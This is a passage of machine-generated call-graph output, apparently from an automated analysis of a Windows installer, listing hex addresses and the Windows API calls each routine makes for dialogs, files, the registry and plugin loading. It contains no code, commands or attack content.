API calls 5309->5314 5311->5301 5318 405e23 3 API calls 5311->5318 5315 4044d3 22 API calls 5312->5315 5313->5299 5316 404af8 CoTaskMemFree 5313->5316 5317 404b86 5314->5317 5319 404a5f 5315->5319 5320 405e23 3 API calls 5316->5320 5356 406554 lstrcpynW 5317->5356 5318->5301 5354 404508 SendMessageW 5319->5354 5322 404b05 5320->5322 5325 404b3c SetDlgItemTextW 5322->5325 5329 406591 21 API calls 5322->5329 5324 404a65 5327 406948 5 API calls 5324->5327 5325->5299 5326 404b9d 5328 406948 5 API calls 5326->5328 5327->5302 5336 404ba4 5328->5336 5330 404b24 lstrcmpiW 5329->5330 5330->5325 5332 404b35 lstrcatW 5330->5332 5331 404be5 5357 406554 lstrcpynW 5331->5357 5332->5325 5334 404bec 5335 405ece 4 API calls 5334->5335 5337 404bf2 GetDiskFreeSpaceW 5335->5337 5336->5331 5340 405e6f 2 API calls 5336->5340 5342 404c3d 5336->5342 5339 404c16 MulDiv 5337->5339 5337->5342 5339->5342 5340->5336 5341 404cae 5344 404cd1 5341->5344 5346 40140b 2 API calls 5341->5346 5342->5341 5343 404e49 24 API calls 5342->5343 5345 404c9b 5343->5345 5358 4044f5 KiUserCallbackDispatcher 5344->5358 5347 404cb0 SetDlgItemTextW 5345->5347 5348 404ca0 5345->5348 5346->5344 5347->5341 5350 404d80 24 API calls 5348->5350 5350->5341 5351 404ced 5351->5303 5359 40491d 5351->5359 5353->5297 5354->5324 5355->5309 5356->5326 5357->5334 5358->5351 5360 404930 SendMessageW 5359->5360 5361 40492b 5359->5361 5360->5303 5361->5360 5362 6fe710e1 5364 6fe71111 5362->5364 5363 6fe712b0 GlobalFree 5364->5363 5365 6fe71240 GlobalFree 5364->5365 5366 6fe711d7 GlobalAlloc 5364->5366 5367 6fe712ab 5364->5367 5368 6fe7135a 2 API calls 5364->5368 5369 6fe71312 2 API calls 5364->5369 5370 6fe7129a GlobalFree 5364->5370 5371 6fe7116b GlobalAlloc 5364->5371 5372 6fe71381 lstrcpyW 5364->5372 5365->5364 5366->5364 5367->5363 5368->5364 5369->5364 5370->5364 5371->5364 5372->5364 4170 4015c8 4171 402dcb 21 API calls 4170->4171 4172 4015cf SetFileAttributesW 4171->4172 4173 4015e1 4172->4173 4174 401fc9 4175 402dcb 21 API calls 4174->4175 4176 401fcf 4175->4176 4189 4055d9 4176->4189 4181 402002 CloseHandle 4185 402953 4181->4185 4184 401ff4 4186 402004 4184->4186 4187 401ff9 4184->4187 4186->4181 4208 40649b wsprintfW 4187->4208 4190 4055f4 4189->4190 4199 401fd9 4189->4199 4191 405610 lstrlenW 4190->4191 4192 406591 21 API calls 4190->4192 4193 405639 4191->4193 4194 40561e lstrlenW 4191->4194 4192->4191 4196 40564c 4193->4196 4197 40563f SetWindowTextW 4193->4197 4195 405630 lstrcatW 4194->4195 4194->4199 4195->4193 4198 405652 SendMessageW SendMessageW SendMessageW 4196->4198 4196->4199 4197->4196 4198->4199 4200 405b37 CreateProcessW 4199->4200 4201 401fdf 4200->4201 4202 405b6a CloseHandle 4200->4202 4201->4181 4201->4185 4203 4069f3 WaitForSingleObject 4201->4203 4202->4201 4204 406a0d 4203->4204 4205 406a1f GetExitCodeProcess 4204->4205 4209 406984 4204->4209 4205->4184 4208->4181 4210 4069a1 PeekMessageW 4209->4210 4211 4069b1 WaitForSingleObject 4210->4211 4212 406997 DispatchMessageW 4210->4212 4211->4204 4212->4210 5376 40554d 5377 405571 5376->5377 5378 40555d 5376->5378 5380 405579 IsWindowVisible 5377->5380 5386 405590 5377->5386 5379 405563 5378->5379 5388 4055ba 5378->5388 5382 40451f SendMessageW 5379->5382 5383 405586 5380->5383 5380->5388 5381 4055bf CallWindowProcW 5384 40556d 5381->5384 5382->5384 5385 404e8e 5 API calls 5383->5385 5385->5386 5386->5381 5387 404f0e 4 API calls 5386->5387 5387->5388 5388->5381 5389 6fe723e9 5390 6fe72453 5389->5390 5391 6fe7245e GlobalAlloc 5390->5391 5392 6fe7247d 5390->5392 5391->5390 4213 40254f 4214 402e0b 21 API calls 4213->4214 4215 402559 4214->4215 4216 402dcb 21 API calls 4215->4216 4217 402562 4216->4217 4218 40256d RegQueryValueExW 4217->4218 4223 402953 4217->4223 4219 402593 RegCloseKey 4218->4219 4220 40258d 4218->4220 4219->4223 4220->4219 4224 40649b wsprintfW 4220->4224 4224->4219 4225 4021cf 4226 402dcb 21 API calls 4225->4226 4227 4021d6 4226->4227 4228 402dcb 21 API calls 4227->4228 4229 4021e0 4228->4229 4230 402dcb 21 API calls 4229->4230 4231 4021ea 4230->4231 4232 402dcb 21 API calls 4231->4232 4233 4021f4 4232->4233 4234 402dcb 21 API calls 4233->4234 4235 4021fe 4234->4235 4236 40223d CoCreateInstance 4235->4236 4237 402dcb 21 API calls 4235->4237 4240 40225c 4236->4240 4237->4236 4239 40231b 4240->4239 4241 401423 4240->4241 4242 4055d9 28 API calls 4241->4242 4243 401431 4242->4243 4243->4239 5393 40204f 5394 402dcb 21 API calls 5393->5394 5395 402056 5394->5395 5396 406948 5 API calls 5395->5396 5397 402065 5396->5397 5398 402081 GlobalAlloc 5397->5398 5399 4020f1 5397->5399 5398->5399 5400 402095 5398->5400 5401 406948 5 API calls 5400->5401 5402 40209c 5401->5402 5403 406948 5 API calls 5402->5403 5404 4020a6 5403->5404 5404->5399 5408 40649b wsprintfW 5404->5408 5406 4020df 5409 40649b wsprintfW 5406->5409 5408->5406 5409->5399 4272 6fe71774 4273 6fe717a3 4272->4273 4296 6fe71bff 4273->4296 4275 6fe717aa 4276 6fe717b1 4275->4276 4277 6fe717bd 4275->4277 4278 6fe71312 2 API calls 4276->4278 4279 6fe717c7 4277->4279 4280 6fe717e4 4277->4280 4283 6fe717bb 4278->4283 4330 6fe715dd wsprintfW 4279->4330 4281 6fe7180e 4280->4281 4282 6fe717ea 4280->4282 4286 6fe715dd 3 API calls 4281->4286 4285 6fe71654 3 API calls 4282->4285 4288 6fe717ef 4285->4288 4286->4283 4290 6fe71312 2 API calls 4288->4290 4292 6fe717f5 GlobalFree 4290->4292 4292->4283 4294 6fe71809 GlobalFree 4292->4294 4294->4283 4341 6fe712bb GlobalAlloc 4296->4341 4298 6fe71c26 4342 6fe712bb GlobalAlloc 4298->4342 4300 6fe71e6b GlobalFree GlobalFree GlobalFree 4301 6fe71e88 4300->4301 4319 6fe71ed2 4300->4319 4303 6fe7227e 4301->4303 4309 6fe71e9d 4301->4309 4301->4319 4302 6fe71d26 GlobalAlloc 4315 6fe71c31 4302->4315 4304 6fe722a0 GetModuleHandleW 4303->4304 4303->4319 4307 6fe722c6 4304->4307 4308 6fe722b1 LoadLibraryW 4304->4308 4305 6fe71d71 lstrcpyW 4311 6fe71d7b lstrcpyW 4305->4311 4306 6fe71d8f GlobalFree 4306->4315 4349 6fe716bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4307->4349 4308->4307 4308->4319 4309->4319 4345 6fe712cc 4309->4345 4311->4315 4312 6fe72318 4314 6fe72325 lstrlenW 4312->4314 4312->4319 4313 6fe72126 4348 6fe712bb GlobalAlloc 4313->4348 4350 6fe716bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4314->4350 4315->4300 4315->4302 4315->4305 4315->4306 4315->4311 4315->4313 4318 6fe721ae 4315->4318 4315->4319 4322 6fe72067 GlobalFree 4315->4322 4324 6fe712cc 2 API calls 4315->4324 4325 6fe71dcd 4315->4325 4318->4319 4326 6fe72216 lstrcpyW 4318->4326 4319->4275 4320 6fe722d8 4320->4312 4329 6fe72302 GetProcAddress 4320->4329 4322->4315 4323 6fe7233f 4323->4319 4324->4315 4325->4315 4343 6fe7162f GlobalSize GlobalAlloc 4325->4343 4326->4319 4328 6fe7212f 4328->4275 4329->4312 4331 6fe71312 2 API calls 4330->4331 4332 6fe715fe 4331->4332 4333 6fe71654 4332->4333 4352 6fe712bb GlobalAlloc 4333->4352 4335 6fe71659 4353 6fe71666 4335->4353 4338 6fe71312 4339 6fe71355 CloseHandle 4338->4339 4340 6fe7131b GlobalAlloc lstrcpynW 4338->4340 4339->4283 4340->4339 4341->4298 4342->4315 4344 6fe7164d 4343->4344 4344->4325 4351 6fe712bb GlobalAlloc 4345->4351 4347 6fe712db lstrcpynW 4347->4319 4348->4328 4349->4320 4350->4323 4351->4347 4352->4335 4354 6fe71672 wsprintfW 4353->4354 4355 6fe7169f lstrcpyW 4353->4355 4358 6fe71663 4354->4358 4355->4358 4358->4338 4359 403fd4 4360 403fec 4359->4360 4361 40414d 4359->4361 4360->4361 4364 403ff8 4360->4364 4362 40419e 4361->4362 4363 40415e GetDlgItem GetDlgItem 4361->4363 4366 4041f8 4362->4366 4378 401389 2 API calls 4362->4378 4365 4044d3 22 API calls 4363->4365 4367 404003 SetWindowPos 4364->4367 4368 404016 4364->4368 4371 404188 SetClassLongW 4365->4371 4388 404148 4366->4388 4432 40451f 4366->4432 4367->4368 4369 404061 4368->4369 4370 40401f ShowWindow 4368->4370 4375 404080 4369->4375 4376 404069 DestroyWindow 4369->4376 4373 40413a 4370->4373 4374 40403f GetWindowLongW 4370->4374 4377 40140b 2 API calls 4371->4377 4454 40453a 4373->4454 4374->4373 4379 404058 ShowWindow 4374->4379 4380 404085 SetWindowLongW 4375->4380 4381 404096 4375->4381 4431 40445c 4376->4431 4377->4362 4382 4041d0 4378->4382 4379->4369 4380->4388 4381->4373 4386 4040a2 GetDlgItem 4381->4386 4382->4366 4387 4041d4 SendMessageW 4382->4387 4384 40140b 2 API calls 4405 40420a 4384->4405 4385 40445e DestroyWindow EndDialog 4385->4431 4390 4040d0 4386->4390 4391 4040b3 SendMessageW IsWindowEnabled 4386->4391 4387->4388 4389 40448d ShowWindow 4389->4388 4393 4040d5 4390->4393 4394 4040dd 4390->4394 4395 4040f0 4390->4395 4396 404124 SendMessageW 4390->4396 4391->4388 4391->4390 4392 406591 21 API calls 4392->4405 4451 4044ac 4393->4451 4394->4393 4394->4396 4398 4040f8 4395->4398 4399 40410d 4395->4399 4396->4373 4448 40140b 4398->4448 4402 40140b 2 API calls 4399->4402 4400 40410b 4400->4373 4404 404114 4402->4404 4403 4044d3 22 API calls 4403->4405 4404->4373 4404->4393 4405->4384 4405->4385 4405->4388 4405->4392 4405->4403 4422 40439e DestroyWindow 4405->4422 4435 4044d3 4405->4435 4407 404285 GetDlgItem 4408 4042a2 ShowWindow KiUserCallbackDispatcher 4407->4408 4409 40429a 4407->4409 4438 4044f5 KiUserCallbackDispatcher 4408->4438 4409->4408 4411 4042cc EnableWindow 4416 4042e0 4411->4416 4412 4042e5 GetSystemMenu EnableMenuItem SendMessageW 4413 404315 SendMessageW 4412->4413 4412->4416 4413->4416 4416->4412 4439 404508 SendMessageW 4416->4439 4440 403fb5 4416->4440 4443 406554 lstrcpynW 4416->4443 4418 404344 lstrlenW 4419 406591 21 API calls 4418->4419 4420 40435a SetWindowTextW 4419->4420 4444 401389 4420->4444 4423 4043b8 CreateDialogParamW 4422->4423 4422->4431 4424 4043eb 4423->4424 4423->4431 4425 4044d3 22 API calls 4424->4425 4426 4043f6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4425->4426 4427 401389 2 API calls 4426->4427 4428 40443c 4427->4428 4428->4388 4429 404444 ShowWindow 4428->4429 4430 40451f SendMessageW 4429->4430 4430->4431 4431->4388 4431->4389 4433 404537 4432->4433 4434 404528 SendMessageW 4432->4434 4433->4405 4434->4433 4436 406591 21 API calls 4435->4436 4437 4044de SetDlgItemTextW 4436->4437 4437->4407 4438->4411 4439->4416 4441 406591 21 API calls 4440->4441 4442 403fc3 SetWindowTextW 4441->4442 4442->4416 4443->4418 4446 401390 4444->4446 4445 4013fe 4445->4405 4446->4445 4447 4013cb MulDiv SendMessageW 4446->4447 4447->4446 4449 401389 2 API calls 4448->4449 4450 401420 4449->4450 4450->4393 4452 4044b3 4451->4452 4453 4044b9 SendMessageW 4451->4453 4452->4453 4453->4400 4455 4045fd 4454->4455 4456 404552 GetWindowLongW 4454->4456 4455->4388 4456->4455 4457 404567 4456->4457 4457->4455 4458 404594 GetSysColor 4457->4458 4459 404597 4457->4459 4458->4459 4460 4045a7 SetBkMode 4459->4460 4461 40459d SetTextColor 4459->4461 4462 4045c5 4460->4462 4463 4045bf GetSysColor 4460->4463 4461->4460 4464 4045d6 4462->4464 4465 4045cc SetBkColor 4462->4465 4463->4462 4464->4455 4466 4045f0 CreateBrushIndirect 4464->4466 4467 4045e9 DeleteObject 4464->4467 4465->4464 4466->4455 4467->4466 5410 401a55 5411 402dcb 21 API calls 5410->5411 5412 401a5e ExpandEnvironmentStringsW 5411->5412 5413 401a72 5412->5413 5415 401a85 5412->5415 5414 401a77 lstrcmpW 5413->5414 5413->5415 5414->5415 4543 4023d7 4544 4023df 4543->4544 4547 4023e5 4543->4547 4545 402dcb 21 API calls 4544->4545 4545->4547 4546 4023f3 4549 402401 4546->4549 4550 402dcb 21 API calls 4546->4550 4547->4546 4548 402dcb 21 API calls 4547->4548 4548->4546 4551 402dcb 21 API calls 4549->4551 4550->4549 4552 40240a WritePrivateProfileStringW 4551->4552 4553 4014d7 4554 402da9 21 API calls 4553->4554 4555 4014dd Sleep 4554->4555 4557 402c4f 4555->4557 4558 6fe72a7f 4559 6fe72acf 4558->4559 4560 6fe72a8f VirtualProtect 4558->4560 4560->4559 5421 402459 5422 402461 5421->5422 5423 40248c 5421->5423 5425 402e0b 21 API calls 5422->5425 5424 402dcb 21 API calls 5423->5424 5426 402493 5424->5426 5427 402468 5425->5427 5432 402e89 5426->5432 5429 402dcb 21 API calls 5427->5429 5431 4024a0 5427->5431 5430 402479 RegDeleteValueW RegCloseKey 5429->5430 5430->5431 5433 402e9d 5432->5433 5435 402e96 5432->5435 5433->5435 5436 402ece 5433->5436 5435->5431 5437 4063c1 RegOpenKeyExW 5436->5437 5438 402efc 5437->5438 5439 402f0c RegEnumValueW 5438->5439 5446 402fa6 5438->5446 5448 402f2f 5438->5448 5440 402f96 RegCloseKey 5439->5440 5439->5448 5440->5446 5441 402f6b RegEnumKeyW 5442 402f74 RegCloseKey 5441->5442 5441->5448 5443 406948 5 API calls 5442->5443 5444 402f84 5443->5444 5444->5446 5447 402f88 RegDeleteKeyW 5444->5447 5445 402ece 6 API calls 5445->5448 5446->5435 5447->5446 5448->5440 5448->5441 5448->5442 5448->5445 4629 40175a 4630 402dcb 21 API calls 4629->4630 4631 401761 SearchPathW 4630->4631 4632 40177c 4631->4632 5449 401d5d 5450 402da9 21 API calls 5449->5450 5451 401d64 5450->5451 5452 402da9 21 API calls 5451->5452 5453 401d70 GetDlgItem 5452->5453 5454 40265d 5453->5454 5455 6fe71979 5457 6fe7199c 5455->5457 5456 6fe719e3 5459 6fe71312 2 API calls 5456->5459 5457->5456 5458 6fe719d1 GlobalFree 5457->5458 5458->5456 5460 6fe71b6e GlobalFree GlobalFree 5459->5460 5461 402663 5462 402692 5461->5462 5463 402677 5461->5463 5465 4026c2 5462->5465 5466 402697 5462->5466 5464 402da9 21 API calls 5463->5464 5475 40267e 5464->5475 5467 402dcb 21 API calls 5465->5467 5468 402dcb 21 API calls 5466->5468 5469 4026c9 lstrlenW 5467->5469 5470 40269e 5468->5470 5469->5475 5478 406576 WideCharToMultiByte 5470->5478 5472 4026b2 lstrlenA 5472->5475 5473 4026f6 5474 40270c 5473->5474 5476 4060f6 WriteFile 5473->5476 5475->5473 5475->5474 5477 406125 5 API calls 5475->5477 5476->5474 5477->5473 5478->5472 5479 6fe72d43 5480 6fe72d5b 5479->5480 5481 6fe7162f 2 API calls 5480->5481 5482 6fe72d76 5481->5482 5483 403be4 5484 403bef 5483->5484 5485 403bf3 5484->5485 5486 403bf6 GlobalAlloc 5484->5486 5486->5485 4633 401966 4634 401968 4633->4634 4635 402dcb 21 API calls 4634->4635 4636 40196d 4635->4636 4639 405c60 4636->4639 4678 405f2b 4639->4678 4642 405c88 DeleteFileW 4649 401976 4642->4649 4643 405c9f 4644 405dca 4643->4644 4692 406554 lstrcpynW 4643->4692 4644->4649 4652 4068b1 2 API calls 4644->4652 4646 405cc5 4647 405cd8 4646->4647 4648 405ccb lstrcatW 4646->4648 4693 405e6f lstrlenW 4647->4693 4650 405cde 4648->4650 4653 405cee lstrcatW 4650->4653 4655 405cf9 lstrlenW FindFirstFileW 4650->4655 4654 405de4 4652->4654 4653->4655 4654->4649 4656 405de8 4654->4656 4658 405dbf 4655->4658 4676 405d1b 4655->4676 4657 405e23 3 API calls 4656->4657 4659 405dee 4657->4659 4658->4644 4661 405c18 5 API calls 4659->4661 4660 405da2 FindNextFileW 4664 405db8 FindClose 4660->4664 4660->4676 4663 405dfa 4661->4663 4665 405e14 4663->4665 4666 405dfe 4663->4666 4664->4658 4668 4055d9 28 API calls 4665->4668 4666->4649 4669 4055d9 28 API calls 4666->4669 4668->4649 4671 405e0b 4669->4671 4670 405c60 64 API calls 4670->4676 4673 406314 40 API calls 4671->4673 4672 4055d9 28 API calls 4672->4660 4674 405e12 4673->4674 4674->4649 4675 4055d9 28 API calls 4675->4676 4676->4660 4676->4670 4676->4672 4676->4675 4697 406554 lstrcpynW 4676->4697 4698 405c18 4676->4698 4706 406314 MoveFileExW 4676->4706 4710 406554 lstrcpynW 4678->4710 4680 405f3c 4711 405ece CharNextW CharNextW 4680->4711 4683 405c80 4683->4642 4683->4643 4684 406802 5 API calls 4690 405f52 4684->4690 4685 405f83 lstrlenW 4686 405f8e 4685->4686 4685->4690 4687 405e23 3 API calls 4686->4687 4689 405f93 GetFileAttributesW 4687->4689 4688 4068b1 2 API calls 4688->4690 4689->4683 4690->4683 4690->4685 4690->4688 4691 405e6f 2 API calls 4690->4691 4691->4685 4692->4646 4694 405e7d 4693->4694 4695 405e83 CharPrevW 4694->4695 4696 405e8f 4694->4696 4695->4694 4695->4696 4696->4650 4697->4676 4699 40601f 2 API calls 4698->4699 4701 405c24 4699->4701 4700 405c45 4700->4676 4701->4700 4702 405c33 RemoveDirectoryW 4701->4702 4703 405c3b DeleteFileW 4701->4703 4704 405c41 4702->4704 4703->4704 4704->4700 4705 405c51 SetFileAttributesW 4704->4705 4705->4700 4707 406328 4706->4707 4709 406335 4706->4709 4717 40619a 4707->4717 4709->4676 4710->4680 4712 405eeb 4711->4712 4716 405efd 4711->4716 4714 405ef8 CharNextW 4712->4714 4712->4716 4713 405f21 4713->4683 4713->4684 4714->4713 4715 405e50 CharNextW 4715->4716 4716->4713 4716->4715 4718 4061f0 GetShortPathNameW 4717->4718 4719 4061ca 4717->4719 4720 406205 4718->4720 4721 40630f 4718->4721 4744 406044 GetFileAttributesW CreateFileW 4719->4744 4720->4721 4723 40620d wsprintfA 4720->4723 4721->4709 4726 406591 21 API calls 4723->4726 4724 4061d4 CloseHandle GetShortPathNameW 4724->4721 4725 4061e8 4724->4725 4725->4718 4725->4721 4727 406235 4726->4727 4745 406044 GetFileAttributesW CreateFileW 4727->4745 4729 406242 4729->4721 4730 406251 GetFileSize GlobalAlloc 4729->4730 4731 406273 4730->4731 4732 406308 CloseHandle 4730->4732 4733 4060c7 ReadFile 4731->4733 4732->4721 4734 40627b 4733->4734 4734->4732 4746 405fa9 lstrlenA 4734->4746 4737 406292 lstrcpyA 4740 4062b4 4737->4740 4738 4062a6 4739 405fa9 4 API calls 4738->4739 4739->4740 4741 4062eb SetFilePointer 4740->4741 4742 4060f6 WriteFile 4741->4742 4743 406301 GlobalFree 4742->4743 4743->4732 4744->4724 4745->4729 4747 405fea lstrlenA 4746->4747 4748 405ff2 4747->4748 4749 405fc3 lstrcmpiA 4747->4749 4748->4737 4748->4738 4749->4748 4750 405fe1 CharNextA 4749->4750 4750->4747 4751 4015e6 4752 402dcb 21 API calls 4751->4752 4753 4015ed 4752->4753 4754 405ece 4 API calls 4753->4754 4766 4015f6 4754->4766 4755 401656 4757 401688 4755->4757 4758 40165b 4755->4758 4756 405e50 CharNextW 4756->4766 4760 401423 28 API calls 4757->4760 4759 401423 28 API calls 4758->4759 4761 401662 4759->4761 4768 401680 4760->4768 4776 406554 lstrcpynW 4761->4776 4765 40166f SetCurrentDirectoryW 4765->4768 4766->4755 4766->4756 4767 40163c GetFileAttributesW 4766->4767 4770 405b1f 4766->4770 4773 405aa8 CreateDirectoryW 4766->4773 4777 405b02 CreateDirectoryW 4766->4777 4767->4766 4771 406948 5 API calls 4770->4771 4772 405b26 4771->4772 4772->4766 4774 405af4 4773->4774 4775 405af8 GetLastError 4773->4775 4774->4766 4775->4774 4776->4765 4778 405b12 4777->4778 4779 405b16 GetLastError 4777->4779 4778->4766 4779->4778 5487 401c68 5488 402da9 21 API calls 5487->5488 5489 401c6f 5488->5489 5490 402da9 21 API calls 5489->5490 5491 401c7c 5490->5491 5492 401c91 5491->5492 5493 402dcb 21 API calls 5491->5493 5494 401ca1 5492->5494 5495 402dcb 21 API calls 5492->5495 5493->5492 5496 401cf8 5494->5496 5497 401cac 5494->5497 5495->5494 5498 402dcb 21 API calls 5496->5498 5499 402da9 21 API calls 5497->5499 5500 401cfd 5498->5500 5501 401cb1 5499->5501 5502 402dcb 21 API calls 5500->5502 5503 402da9 21 API calls 5501->5503 5504 401d06 FindWindowExW 5502->5504 5505 401cbd 5503->5505 5508 401d28 5504->5508 5506 401ce8 SendMessageW 5505->5506 5507 401cca SendMessageTimeoutW 5505->5507 5506->5508 5507->5508 5509 4028e9 5510 4028ef 5509->5510 5511 4028f7 FindClose 5510->5511 5512 402c4f 5510->5512 5511->5512 5513 4016f1 5514 402dcb 21 API calls 5513->5514 5515 4016f7 GetFullPathNameW 5514->5515 5516 401711 5515->5516 5517 401733 5515->5517 5516->5517 5520 4068b1 2 API calls 5516->5520 5518 401748 GetShortPathNameW 5517->5518 5519 402c4f 5517->5519 5518->5519 5521 401723 5520->5521 5521->5517 5523 406554 lstrcpynW 5521->5523 5523->5517 5524 401e73 GetDC 5525 402da9 21 API calls 5524->5525 5526 401e85 GetDeviceCaps MulDiv ReleaseDC 5525->5526 5527 402da9 21 API calls 5526->5527 5528 401eb6 5527->5528 5529 406591 21 API calls 5528->5529 5530 401ef3 CreateFontIndirectW 5529->5530 5531 40265d 5530->5531 5532 4014f5 SetForegroundWindow 5533 402c4f 5532->5533 5051 405b7a ShellExecuteExW 5534 40197b 5535 402dcb 21 API calls 5534->5535 5536 401982 lstrlenW 5535->5536 5537 40265d 5536->5537 5052 4020fd 5053 4021c1 5052->5053 5054 40210f 5052->5054 5056 401423 28 API calls 5053->5056 5055 402dcb 21 API calls 5054->5055 5057 402116 5055->5057 5063 40231b 5056->5063 5058 402dcb 21 API calls 5057->5058 5059 40211f 5058->5059 5060 402135 LoadLibraryExW 5059->5060 5061 402127 GetModuleHandleW 5059->5061 5060->5053 5062 402146 5060->5062 5061->5060 5061->5062 5075 4069b7 5062->5075 5066 402190 5070 4055d9 28 API calls 5066->5070 5067 402157 5068 402176 5067->5068 5069 40215f 5067->5069 5080 6fe71817 5068->5080 5071 401423 28 API calls 5069->5071 5072 402167 5070->5072 5071->5072 5072->5063 5073 4021b3 FreeLibrary 5072->5073 5073->5063 5122 406576 WideCharToMultiByte 5075->5122 5077 4069d4 5078 4069db GetProcAddress 5077->5078 5079 402151 5077->5079 5078->5079 5079->5066 5079->5067 5081 6fe7184a 5080->5081 5082 6fe71bff 22 API calls 5081->5082 5083 6fe71851 5082->5083 5084 6fe71976 5083->5084 5085 6fe71862 5083->5085 5086 6fe71869 5083->5086 5084->5072 5139 6fe7243e 5085->5139 5123 6fe72480 5086->5123 5091 6fe718af 5152 6fe72655 5091->5152 5092 6fe718cd 5095 6fe718d3 5092->5095 5096 6fe7191e 5092->5096 5093 6fe7187f 5098 6fe71885 5093->5098 5103 6fe71890 5093->5103 5094 6fe71898 5109 6fe7188e 5094->5109 5149 6fe72e23 5094->5149 5099 6fe71666 2 API calls 5095->5099 5101 6fe72655 10 API calls 5096->5101 5098->5109 5133 6fe72b98 5098->5133 5106 6fe718f0 5099->5106 5107 6fe7190f 5101->5107 5102 6fe718b5 5108 6fe71654 3 API calls 5102->5108 5143 6fe72810 5103->5143 5111 6fe72655 10 API calls 5106->5111 5113 6fe71965 5107->5113 5163 6fe72618 5107->5163 5112 6fe718bb 5108->5112 5109->5091 5109->5092 5110 6fe71896 5110->5109 5111->5107 5114 6fe71312 2 API calls 5112->5114 5113->5084 5115 6fe7196f GlobalFree 5113->5115 5117 6fe718c1 GlobalFree 5114->5117 5115->5084 5117->5107 5119 6fe71951 5119->5113 5120 6fe715dd 3 API calls 5119->5120 5120->5113 5121 6fe7194a FreeLibrary 5121->5119 5122->5077 5129 6fe72498 5123->5129 5125 6fe725c1 GlobalFree 5128 6fe7186f 5125->5128 5125->5129 5126 6fe72540 GlobalAlloc WideCharToMultiByte 5126->5125 5127 6fe7256b GlobalAlloc CLSIDFromString 5127->5125 5128->5093 5128->5094 5128->5109 5129->5125 5129->5126 5129->5127 5130 6fe712cc GlobalAlloc lstrcpynW 5129->5130 5132 6fe7258a 5129->5132 5167 6fe7135a 5129->5167 5130->5129 5132->5125 5171 6fe727a4 5132->5171 5136 6fe72baa 5133->5136 5134 6fe72c4f CreateFileA 5135 6fe72c6d 5134->5135 5174 6fe72b42 5135->5174 5136->5134 5138 6fe72d39 5138->5109 5140 6fe72453 5139->5140 5141 6fe7245e GlobalAlloc 5140->5141 5142 6fe71868 5140->5142 5141->5140 5142->5086 5147 6fe72840 5143->5147 5144 6fe728ee 5146 6fe728f4 GlobalSize 5144->5146 5148 6fe728fe 5144->5148 5145 6fe728db GlobalAlloc 5145->5148 5146->5148 5147->5144 5147->5145 5148->5110 5150 6fe72e2e 5149->5150 5151 6fe72e6e GlobalFree 5150->5151 5178 6fe712bb GlobalAlloc 5152->5178 5154 6fe7270b lstrcpynW 5160 6fe7265f 5154->5160 5155 6fe726fa StringFromGUID2 5155->5160 5156 6fe726d8 MultiByteToWideChar 5156->5160 5157 6fe7271e wsprintfW 5157->5160 5158 6fe72742 GlobalFree 5158->5160 5159 6fe72777 GlobalFree 5159->5102 5160->5154 5160->5155 5160->5156 5160->5157 5160->5158 5160->5159 5161 6fe71312 2 API calls 5160->5161 5179 6fe71381 5160->5179 5161->5160 5164 6fe72626 5163->5164 5166 6fe71931 5163->5166 5165 6fe72642 GlobalFree 5164->5165 5164->5166 5165->5164 5166->5119 5166->5121 5168 6fe71361 5167->5168 5169 6fe712cc 2 API calls 5168->5169 5170 6fe7137f 5169->5170 5170->5129 5172 6fe727b2 VirtualAlloc 5171->5172 5173 6fe72808 5171->5173 5172->5173 5173->5132 5175 6fe72b4d 5174->5175 5176 6fe72b52 GetLastError 5175->5176 5177 6fe72b5d 5175->5177 5176->5177 5177->5138 5178->5160 5180 6fe713ac 5179->5180 5181 6fe7138a 5179->5181 5180->5160 5181->5180 5182 6fe71390 lstrcpyW 5181->5182 5182->5180 5538 40497d 5539 4049b3 5538->5539 5540 40498d 5538->5540 5542 40453a 8 API calls 5539->5542 5541 4044d3 22 API calls 5540->5541 5543 40499a SetDlgItemTextW 5541->5543 5544 4049bf 5542->5544 5543->5539 5545 402b7e 5546 402bd0 5545->5546 5547 402b85 5545->5547 5548 406948 5 API calls 5546->5548 5549 402da9 21 API calls 5547->5549 5553 402bce 5547->5553 5550 402bd7 5548->5550 5551 402b93 5549->5551 5552 402dcb 21 API calls 5550->5552 5554 402da9 21 API calls 5551->5554 5555 402be0 5552->5555 5558 402b9f 5554->5558 5555->5553 5556 402be4 IIDFromString 5555->5556 5556->5553 5557 402bf3 5556->5557 5557->5553 5563 406554 lstrcpynW 5557->5563 5562 40649b wsprintfW 5558->5562 5560 402c10 CoTaskMemFree 5560->5553 5562->5553 5563->5560 5183 6fe71058 5185 6fe71074 5183->5185 5184 6fe710dd 5185->5184 5187 6fe71092 5185->5187 5197 6fe715b6 5185->5197 5188 6fe715b6 GlobalFree 5187->5188 5189 6fe710a2 5188->5189 5190 6fe710b2 5189->5190 5191 6fe710a9 GlobalSize 5189->5191 5192 6fe710b6 GlobalAlloc 5190->5192 5193 6fe710c8 5190->5193 5191->5190 5194 6fe715dd 3 API calls 5192->5194 5196 6fe710d2 GlobalFree 5193->5196 5195 6fe710c7 5194->5195 5195->5193 5196->5184 5198 6fe715bc 5197->5198 5199 6fe715c2 5198->5199 5200 6fe715ce GlobalFree 5198->5200 5199->5187 5200->5187 5564 401000 5565 401037 BeginPaint GetClientRect 5564->5565 5566 40100c DefWindowProcW 5564->5566 5568 4010f3 5565->5568 5569 401179 5566->5569 5570 401073 CreateBrushIndirect FillRect DeleteObject 5568->5570 5571 4010fc 5568->5571 5570->5568 5572 401102 CreateFontIndirectW 5571->5572 5573 401167 EndPaint 5571->5573 5572->5573 5574 401112 6 API calls 5572->5574 5573->5569 5574->5573 5575 402a80 5576 402da9 21 API calls 5575->5576 5577 402a86 5576->5577 5578 402ac9 5577->5578 5579 402aad 5577->5579 5586 402953 5577->5586 5580 402ae3 5578->5580 5581 402ad3 5578->5581 5582 402ab2 5579->5582 5583 402ac3 5579->5583 5585 406591 21 API calls 5580->5585 5584 402da9 21 API calls 5581->5584 5589 406554 lstrcpynW 5582->5589 5590 40649b wsprintfW 5583->5590 5584->5586 5585->5586 5589->5586 5590->5586 4127 401781 4133 402dcb 4127->4133 4131 40178f 4132 406073 2 API calls 4131->4132 4132->4131 4134 402dd7 4133->4134 4135 406591 21 API calls 4134->4135 4136 402df8 4135->4136 4137 401788 4136->4137 4138 406802 5 API calls 4136->4138 4139 406073 4137->4139 4138->4137 4140 406080 GetTickCount GetTempFileNameW 4139->4140 4141 4060ba 4140->4141 4142 4060b6 4140->4142 4141->4131 4142->4140 4142->4141 